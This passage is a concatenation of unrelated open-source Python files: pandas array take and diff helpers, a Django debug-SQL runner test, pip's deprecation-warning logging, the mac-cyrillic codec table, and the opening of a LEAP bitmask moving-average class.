        Either element may be None, meaning "take everything" on that axis.
    out : ndarray, optional
        Preallocated output array; when filling is required its dtype must
        match the promoted dtype, otherwise TypeError is raised.
    fill_value : any, default np.nan
        Value written at positions whose index is -1 (only if allow_fill).
    mask_info : tuple, optional
        Precomputed ``((row_mask, col_mask), (row_needs, col_needs))`` so
        callers can avoid recomputing the -1 masks.
    allow_fill : bool, default True
        If False, -1 entries are treated as ordinary positional indices and
        no dtype promotion or masking is done.
    """
    if indexer is None or (indexer[0] is None and indexer[1] is None):
        # No selection on either axis: take everything, keep the dtype.
        row_idx = np.arange(arr.shape[0], dtype=np.int64)
        col_idx = np.arange(arr.shape[1], dtype=np.int64)
        indexer = row_idx, col_idx
        dtype, fill_value = arr.dtype, arr.dtype.type()
    else:
        # Normalize each axis indexer to an int64 ndarray (None -> take all).
        row_idx, col_idx = indexer
        if row_idx is None:
            row_idx = np.arange(arr.shape[0], dtype=np.int64)
        else:
            row_idx = _ensure_int64(row_idx)
        if col_idx is None:
            col_idx = np.arange(arr.shape[1], dtype=np.int64)
        else:
            col_idx = _ensure_int64(col_idx)
        indexer = row_idx, col_idx
        if not allow_fill:
            # -1 entries are plain indices: no promotion, no masking.
            dtype, fill_value = arr.dtype, arr.dtype.type()
            mask_info = None, False
        else:
            # check for promotion based on types only (do this first because
            # it's faster than computing a mask)
            dtype, fill_value = maybe_promote(arr.dtype, fill_value)
            if dtype != arr.dtype and (out is None or out.dtype != dtype):
                # check if promotion is actually required based on indexer
                if mask_info is not None:
                    (row_mask, col_mask), (row_needs, col_needs) = mask_info
                else:
                    row_mask = row_idx == -1
                    col_mask = col_idx == -1
                    row_needs = row_mask.any()
                    col_needs = col_mask.any()
                    mask_info = (row_mask, col_mask), (row_needs, col_needs)
                if row_needs or col_needs:
                    if out is not None and out.dtype != dtype:
                        raise TypeError('Incompatible type for fill_value')
                else:
                    # if not, then depromote, set fill_value to dummy
                    # (it won't be used but we don't want the cython code
                    # to crash when trying to cast it to dtype)
                    dtype, fill_value = arr.dtype, arr.dtype.type()
    # at this point, it's guaranteed that dtype can hold both the arr values
    # and the fill_value
    if out is None:
        out_shape = len(row_idx), len(col_idx)
        out = np.empty(out_shape, dtype=dtype)
    # Prefer a dtype-specialized Cython kernel; next try a same-dtype kernel
    # wrapped with an input conversion; finally fall back to the generic
    # object-dtype implementation.
    func = _take_2d_multi_dict.get((arr.dtype.name, out.dtype.name), None)
    if func is None and arr.dtype != out.dtype:
        func = _take_2d_multi_dict.get((out.dtype.name, out.dtype.name), None)
        if func is not None:
            func = _convert_wrapper(func, out.dtype)
    if func is None:
        def func(arr, indexer, out, fill_value=np.nan):
            _take_2d_multi_object(arr, indexer, out, fill_value=fill_value,
                                  mask_info=mask_info)
    func(arr, indexer, out=out, fill_value=fill_value)
    return out
# ---- #
# diff #
# ---- #
# Dispatch table mapping dtype names to specialized 2-D Cython diff kernels;
# dtypes not listed here take the generic slicing path in ``diff``.
_diff_special = {
    'float64': algos.diff_2d_float64,
    'float32': algos.diff_2d_float32,
    'int64': algos.diff_2d_int64,
    'int32': algos.diff_2d_int32,
    'int16': algos.diff_2d_int16,
    'int8': algos.diff_2d_int8,
}
def diff(arr, n, axis=0):
    """
    difference of n between self,
    analogous to ``s - s.shift(n)``

    Parameters
    ----------
    arr : ndarray
    n : int
        number of periods
    axis : int
        axis to shift on

    Returns
    -------
    shifted : ndarray
        Same shape as ``arr``; the ``abs(n)`` leading (or trailing, for
        negative ``n``) positions along ``axis`` hold the NA marker.
    """
    n = int(n)
    na = np.nan
    dtype = arr.dtype
    is_timedelta = False
    if needs_i8_conversion(arr):
        # Datetime-like data is differenced on its int64 (i8) view and
        # converted back to timedelta64[ns] at the end; iNaT marks missing.
        dtype = np.float64
        arr = arr.view('i8')
        na = iNaT
        is_timedelta = True
    elif is_bool_dtype(dtype):
        # bool - bool has no useful numeric meaning; fall back to object.
        dtype = np.object_
    elif is_integer_dtype(dtype):
        # The result must be able to hold NaN, so upcast ints to float64.
        dtype = np.float64
    dtype = np.dtype(dtype)
    out_arr = np.empty(arr.shape, dtype=dtype)
    # Positions with no lagged counterpart are filled with the NA marker.
    na_indexer = [slice(None)] * arr.ndim
    na_indexer[axis] = slice(None, n) if n >= 0 else slice(n, None)
    out_arr[tuple(na_indexer)] = na
    if arr.ndim == 2 and arr.dtype.name in _diff_special:
        # Fast path: specialized 2-D Cython kernel for this dtype.
        f = _diff_special[arr.dtype.name]
        f(arr, out_arr, n, axis)
    else:
        # Generic path: subtract a lagged slice from the leading slice.
        res_indexer = [slice(None)] * arr.ndim
        res_indexer[axis] = slice(n, None) if n >= 0 else slice(None, n)
        res_indexer = tuple(res_indexer)
        lag_indexer = [slice(None)] * arr.ndim
        lag_indexer[axis] = slice(None, -n) if n > 0 else slice(-n, None)
        lag_indexer = tuple(lag_indexer)
        # need to make sure that we account for na for datelike/timedelta
        # we don't actually want to subtract these i8 numbers
        if is_timedelta:
            res = arr[res_indexer]
            lag = arr[lag_indexer]
            mask = (arr[res_indexer] == na) | (arr[lag_indexer] == na)
            if mask.any():
                # Zero out NA slots before subtracting so iNaT sentinels are
                # never combined arithmetically, then restore NA afterwards.
                res = res.copy()
                res[mask] = 0
                lag = lag.copy()
                lag[mask] = 0
            result = res - lag
            result[mask] = na
            out_arr[res_indexer] = result
        else:
            out_arr[res_indexer] = arr[res_indexer] - arr[lag_indexer]
    if is_timedelta:
        from pandas import TimedeltaIndex
        # Convert the i8 differences back to timedelta64[ns], keeping NaT.
        out_arr = TimedeltaIndex(out_arr.ravel().astype('int64')).asi8.reshape(
            out_arr.shape).astype('timedelta64[ns]')
    return out_arr
| bsd-3-clause |
weiawe/django | tests/test_runner/test_debug_sql.py | 210 | 4048 | import sys
import unittest
from django.db import connection
from django.test import TestCase
from django.test.runner import DiscoverRunner
from django.utils import six
from django.utils.encoding import force_text
from .models import Person
@unittest.skipUnless(connection.vendor == 'sqlite', 'Only run on sqlite so we can check output SQL.')
class TestDebugSQL(unittest.TestCase):
    """Verify that DiscoverRunner(debug_sql=True) echoes the executed SQL:
    always for failing/erroring tests, and for passing tests only at
    verbosity >= 2."""
    class PassingTest(TestCase):
        # Runs one query and succeeds; its SQL should appear only in
        # verbose output.
        def runTest(self):
            Person.objects.filter(first_name='pass').count()
    class FailingTest(TestCase):
        # Runs one query, then fails; its SQL should always be shown.
        def runTest(self):
            Person.objects.filter(first_name='fail').count()
            self.fail()
    class ErrorTest(TestCase):
        # Runs one query, then raises; its SQL should always be shown.
        def runTest(self):
            Person.objects.filter(first_name='error').count()
            raise Exception
    def _test_output(self, verbosity):
        # Run the three inner test cases through a debug-SQL runner at the
        # given verbosity and return everything written to its stream.
        runner = DiscoverRunner(debug_sql=True, verbosity=0)
        suite = runner.test_suite()
        suite.addTest(self.FailingTest())
        suite.addTest(self.ErrorTest())
        suite.addTest(self.PassingTest())
        old_config = runner.setup_databases()
        stream = six.StringIO()
        resultclass = runner.get_resultclass()
        runner.test_runner(
            verbosity=verbosity,
            stream=stream,
            resultclass=resultclass,
        ).run(suite)
        runner.teardown_databases(old_config)
        if six.PY2:
            # On Python 2 the stream buffer may hold bytestrings; normalize
            # so the assertions below compare text against text.
            stream.buflist = [force_text(x) for x in stream.buflist]
        return stream.getvalue()
    def test_output_normal(self):
        # At verbosity 1 only failing/erroring tests dump their SQL.
        full_output = self._test_output(1)
        for output in self.expected_outputs:
            self.assertIn(output, full_output)
        for output in self.verbose_expected_outputs:
            self.assertNotIn(output, full_output)
    def test_output_verbose(self):
        # At verbosity 2 the passing test's SQL is included as well.
        full_output = self._test_output(2)
        for output in self.expected_outputs:
            self.assertIn(output, full_output)
        for output in self.verbose_expected_outputs:
            self.assertIn(output, full_output)
    # Expected log snippets differ between Python 2 and 3 only in the
    # unicode literal prefixes (u'...') shown in the logged PARAMS.
    if six.PY3:
        expected_outputs = [
            ('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = ('*', 'error');'''),
            ('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = ('*', 'fail');'''),
        ]
    else:
        expected_outputs = [
            ('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = (u'*', u'error');'''),
            ('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = (u'*', u'fail');'''),
        ]
    verbose_expected_outputs = [
        # Output format changed in Python 3.5+
        x.format('' if sys.version_info < (3, 5) else 'TestDebugSQL.') for x in [
            'runTest (test_runner.test_debug_sql.{}FailingTest) ... FAIL',
            'runTest (test_runner.test_debug_sql.{}ErrorTest) ... ERROR',
            'runTest (test_runner.test_debug_sql.{}PassingTest) ... ok',
        ]
    ]
    if six.PY3:
        verbose_expected_outputs += [
            ('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = ('*', 'pass');'''),
        ]
    else:
        verbose_expected_outputs += [
            ('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
             '''FROM "test_runner_person" WHERE '''
             '''"test_runner_person"."first_name" = %s' '''
             '''- PARAMS = (u'*', u'pass');'''),
        ]
| bsd-3-clause |
wbrefvem/heroku-buildpack-python | vendor/pip-pop/pip/utils/deprecation.py | 271 | 2152 | """
A module that implements tooling to enable easy warnings about deprecations.
"""
from __future__ import absolute_import
import logging
import warnings
class PipDeprecationWarning(Warning):
    """Base class for all of pip's own deprecation warnings."""
    pass
class RemovedInPip8Warning(PipDeprecationWarning, PendingDeprecationWarning):
    """Warns about behavior scheduled for removal in pip 8."""
    pass
class RemovedInPip9Warning(PipDeprecationWarning, PendingDeprecationWarning):
    """Warns about behavior scheduled for removal in pip 9."""
    pass
# Every deprecation warning category the pip machinery knows about.
DEPRECATIONS = [RemovedInPip8Warning, RemovedInPip9Warning]
# Warnings <-> Logging Integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
    """Replacement for ``warnings.showwarning`` installed by
    ``install_warning_logger``.

    Warnings written to an explicit file are forwarded to the original
    ``showwarning`` hook unchanged; pip's own deprecation warnings are
    routed through the ``pip.deprecations`` logger instead.
    """
    if file is not None:
        # An explicit destination file: defer entirely to the saved hook.
        if _warnings_showwarning is not None:
            _warnings_showwarning(
                message, category, filename, lineno, file, line,
            )
        return
    if not issubclass(category, PipDeprecationWarning):
        # Not one of ours -- let the original hook handle it.
        _warnings_showwarning(
            message, category, filename, lineno, file, line,
        )
        return
    # We use a specially named logger which will handle all of the
    # deprecation messages for pip.
    logger = logging.getLogger("pip.deprecations")
    # %-interpolation is done by hand (not via the logging machinery) so
    # the record reads as if someone typed the whole message out.
    log_message = "DEPRECATION: %s" % message
    # Plain DeprecationWarnings disappear in the very next pip release, so
    # they are logged at ERROR to stand out; PendingDeprecationWarnings
    # still have at least two releases to go and stay at WARNING.
    if issubclass(category, DeprecationWarning):
        logger.error(log_message)
    else:
        logger.warning(log_message)
def install_warning_logger():
    """Route warnings through ``_showwarning``, saving the original hook.

    Idempotent: the original ``warnings.showwarning`` is captured only on
    the first call, so repeated calls cannot chain the hook onto itself.
    """
    global _warnings_showwarning
    if _warnings_showwarning is None:
        _warnings_showwarning = warnings.showwarning
        warnings.showwarning = _showwarning
| mit |
ArneBab/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/mac_cyrillic.py | 593 | 13710 | """ Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless mac-cyrillic codec backed by the charmap tables below."""
    def encode(self,input,errors='strict'):
        # Map each unicode character to its mac-cyrillic byte.
        return codecs.charmap_encode(input,errors,encoding_table)
    def decode(self,input,errors='strict'):
        # Map each byte to the unicode character in decoding_table.
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; charmap codecs need no state between chunks."""
    def encode(self, input, final=False):
        return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; each byte maps independently, so no state."""
    def decode(self, input, final=False):
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    """Stream writer; inherits encode() from Codec."""
    pass
class StreamReader(Codec,codecs.StreamReader):
    """Stream reader; inherits decode() from Codec."""
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record used by the codecs registry for
    the 'mac-cyrillic' encoding."""
    return codecs.CodecInfo(
        name='mac-cyrillic',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\u0410' # 0x80 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0x81 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0x82 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0x83 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0x84 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0x85 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0x86 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0x87 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0x88 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0x89 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0x8A -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0x8B -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0x8C -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0x8D -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0x8E -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0x8F -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0x90 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0x91 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0x92 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0x93 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0x94 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0x95 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0x96 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0x97 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0x98 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0x99 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0x9A -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0x9B -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0x9C -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0x9D -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0x9E -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0x9F -> CYRILLIC CAPITAL LETTER YA
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\u0490' # 0xA2 -> CYRILLIC CAPITAL LETTER GHE WITH UPTURN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\u0406' # 0xA7 -> CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\u0402' # 0xAB -> CYRILLIC CAPITAL LETTER DJE
u'\u0452' # 0xAC -> CYRILLIC SMALL LETTER DJE
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\u0403' # 0xAE -> CYRILLIC CAPITAL LETTER GJE
u'\u0453' # 0xAF -> CYRILLIC SMALL LETTER GJE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\u0456' # 0xB4 -> CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u0491' # 0xB6 -> CYRILLIC SMALL LETTER GHE WITH UPTURN
u'\u0408' # 0xB7 -> CYRILLIC CAPITAL LETTER JE
u'\u0404' # 0xB8 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0454' # 0xB9 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0407' # 0xBA -> CYRILLIC CAPITAL LETTER YI
u'\u0457' # 0xBB -> CYRILLIC SMALL LETTER YI
u'\u0409' # 0xBC -> CYRILLIC CAPITAL LETTER LJE
u'\u0459' # 0xBD -> CYRILLIC SMALL LETTER LJE
u'\u040a' # 0xBE -> CYRILLIC CAPITAL LETTER NJE
u'\u045a' # 0xBF -> CYRILLIC SMALL LETTER NJE
u'\u0458' # 0xC0 -> CYRILLIC SMALL LETTER JE
u'\u0405' # 0xC1 -> CYRILLIC CAPITAL LETTER DZE
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\u040b' # 0xCB -> CYRILLIC CAPITAL LETTER TSHE
u'\u045b' # 0xCC -> CYRILLIC SMALL LETTER TSHE
u'\u040c' # 0xCD -> CYRILLIC CAPITAL LETTER KJE
u'\u045c' # 0xCE -> CYRILLIC SMALL LETTER KJE
u'\u0455' # 0xCF -> CYRILLIC SMALL LETTER DZE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u201e' # 0xD7 -> DOUBLE LOW-9 QUOTATION MARK
u'\u040e' # 0xD8 -> CYRILLIC CAPITAL LETTER SHORT U
u'\u045e' # 0xD9 -> CYRILLIC SMALL LETTER SHORT U
u'\u040f' # 0xDA -> CYRILLIC CAPITAL LETTER DZHE
u'\u045f' # 0xDB -> CYRILLIC SMALL LETTER DZHE
u'\u2116' # 0xDC -> NUMERO SIGN
u'\u0401' # 0xDD -> CYRILLIC CAPITAL LETTER IO
u'\u0451' # 0xDE -> CYRILLIC SMALL LETTER IO
u'\u044f' # 0xDF -> CYRILLIC SMALL LETTER YA
u'\u0430' # 0xE0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xE1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0xE2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0xE3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0xE4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xE5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0xE6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0xE7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0xE8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xE9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xEA -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xEB -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xEC -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xED -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xEE -> CYRILLIC SMALL LETTER O
u'\u043f' # 0xEF -> CYRILLIC SMALL LETTER PE
u'\u0440' # 0xF0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xF1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xF2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xF3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0xF4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0xF5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0xF6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0xF7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0xF8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0xF9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0xFA -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0xFB -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0xFC -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0xFD -> CYRILLIC SMALL LETTER E
u'\u044e' # 0xFE -> CYRILLIC SMALL LETTER YU
u'\u20ac' # 0xFF -> EURO SIGN
)
### Encoding table
# Build the reverse (unicode -> byte) mapping from the decoding table.
encoding_table=codecs.charmap_build(decoding_table)
| mit |
andrejb/bitmask_client | src/leap/bitmask/util/averages.py | 8 | 2472 | # -*- coding: utf-8 -*-
# averages.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Utility class for moving averages.
It is used in the status panel widget for displaying up and down
download rates.
"""
from leap.bitmask.util import first
class RateMovingAverage(object):
    """
    Moving window average for calculating
    upload and download rates.

    Data points are ``(timestamp, traffic)`` tuples; the rate is the
    traffic delta across the window divided by the elapsed seconds,
    expressed in KiB/s.
    """
    #: Number of samples kept in the moving window.
    SAMPLE_SIZE = 5
    def __init__(self):
        """
        Initializes an empty array of fixed size
        """
        self.reset()
    def reset(self):
        # Fixed-size window, oldest sample first; empty slots hold None.
        self._data = [None for i in range(self.SAMPLE_SIZE)]
    def append(self, x):
        """
        Appends a new data point to the collection.

        :param x: A tuple containing timestamp and traffic points
                  in the form (timestamp, traffic)
        :type x: tuple
        """
